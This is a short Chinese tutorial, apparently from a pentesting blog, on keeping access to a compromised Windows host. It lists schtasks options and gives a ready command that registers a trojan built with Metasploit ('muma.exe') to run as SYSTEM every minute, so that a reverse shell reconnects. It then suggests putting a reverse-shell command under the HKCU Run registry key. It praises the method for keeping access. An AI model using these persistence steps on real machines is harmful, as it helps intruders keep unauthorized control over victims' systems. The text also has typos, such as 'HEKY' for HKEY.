【内网渗透】后渗透之计划任务后门

1、前言

我们做权限维持的时候，万一出了啥情况，shell就掉了，这时候可以去写一个计划任务，帮助我们获得权限

2、实操

首先你需要知道计划任务怎么用

schtasks /Create /tn Updater /tr notepad.exe /sc MINUTE /mo 1

/tn 任务名字
/tr 启动运行的脚本
/sc 多久运行一次
/Create 创建新计划任务
/Delete 删除计划任务
/Query 显示计划热为奴
/Change 更改计划任务属性
/Run 按需运行计划任务
/End 中止当前正在运行的计划任务
/ShowSid 显示与计划的任务名称相应的安全标识符
/? 显示帮助信息

然后你需要用msf生成一个马子，再创建一个计划任务
schtasks /create /tn muma /sc minute /mo 1 /tr C:\muma.exe /ru system /f

新建一个计划任务，每分钟启动一次

开启我们的msf监听

反弹成功

3、后续

如果你计划任务用不明白，还有一个思路，注册表

原理

  Run该项下的键值为开机启动项，每一次随着开机而启动
    位置
    \HEKY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

将值设置为反弹shell的命令，即每次开机都会执行这个命令

4、总结

非常滴好用，大家做权限维持的时候一定要多学思路与方法！